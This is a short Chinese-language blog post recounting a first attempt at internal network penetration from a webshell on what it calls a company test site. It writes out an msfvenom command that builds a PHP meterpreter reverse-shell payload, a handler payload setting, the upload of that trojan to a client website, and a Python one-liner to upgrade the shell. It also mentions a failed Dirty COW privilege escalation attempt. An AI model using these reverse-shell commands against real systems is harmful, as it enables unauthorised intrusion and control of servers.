初探内网渗透
0x00 前言
公司的测试站,拿到了一个shell,然后准备内网一波,技术菜,第一次尝试内网渗透
0x01 反弹shell
公司大佬仍了一个shell,使用冰蝎连接后发现命令行不好用,命令无法成功执行,因为是linux的,所以准备提权用脏牛提权一波,但是执行gcc命令,没有返回。。没办法只能上msf了,开整.
首先是用msf生成了一个php的反弹木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >text.php |
下面就是用msf接收反弹的shell了
set payload windows/meterpreter/reverse_tcp |
把生成的php木马上传到客户网站,然后运行一波
反弹成功
使用一条python命令返回一个回显窗口
python -c 'import pty;pty.spawn("/bin/bash")' |
看了下权限,很低,所以尝试用脏牛,但是内核是4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 版本太高了,没办法提权,只能测试其他方法了
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Time'Blog!
评论